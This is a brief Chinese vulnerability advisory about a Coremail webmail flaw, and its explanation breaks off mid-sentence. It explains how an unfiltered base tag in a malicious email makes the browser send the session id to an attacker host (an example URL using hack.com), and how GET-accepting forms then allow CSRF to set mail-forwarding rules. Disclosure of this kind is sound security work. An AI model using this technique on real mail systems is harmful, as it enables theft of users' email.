Coremail一个CSRF 攻击可窃取用户邮件

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 利用 Coremail 邮件正文 filter 的一个漏洞,当用户打开 bad mail 时会触发 CSRF,进而设置邮件转发规则。 ### 详细说明: Coremail 把邮件正文的 ``` <img src='csrf.jpg'/> ``` 替换成 [<img src="https://images.seebug.org/upload/201406/15044338b8c6b4212d4a7f4a2538bb77212c2794.png" alt="0.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/15044338b8c6b4212d4a7f4a2538bb77212c2794.png) 嗯,这里是相对地址,正巧 Coremail 没有过滤 ``` <base> ``` tag。 [<img src="https://images.seebug.org/upload/201407/231558444a9c5674e6c247e7d001f651e94ab527.jpg" alt="150444205b8cb7cb036f55091ba028a5f83fa443.png.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/231558444a9c5674e6c247e7d001f651e94ab527.jpg) 以 http://mail.***.edu.cn 为例,用户浏览器会解析此地址为 http://hack.com/coremail/s?func=user:proxyGet&sid=CAPplXssSmOlqAgclQsslyZkmdzLcYdA&mid=2:1tbiAgQPE1KpqPIw4QAAsq&url=csrf.jpg hack.com 后端即可获取 sid(仍然无法获得 cookie)。 Coremail 后端 jsp 获取表单请求没有判断 POST/GET,通过 302 redirect 即可构造 CSRF。 下图是...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息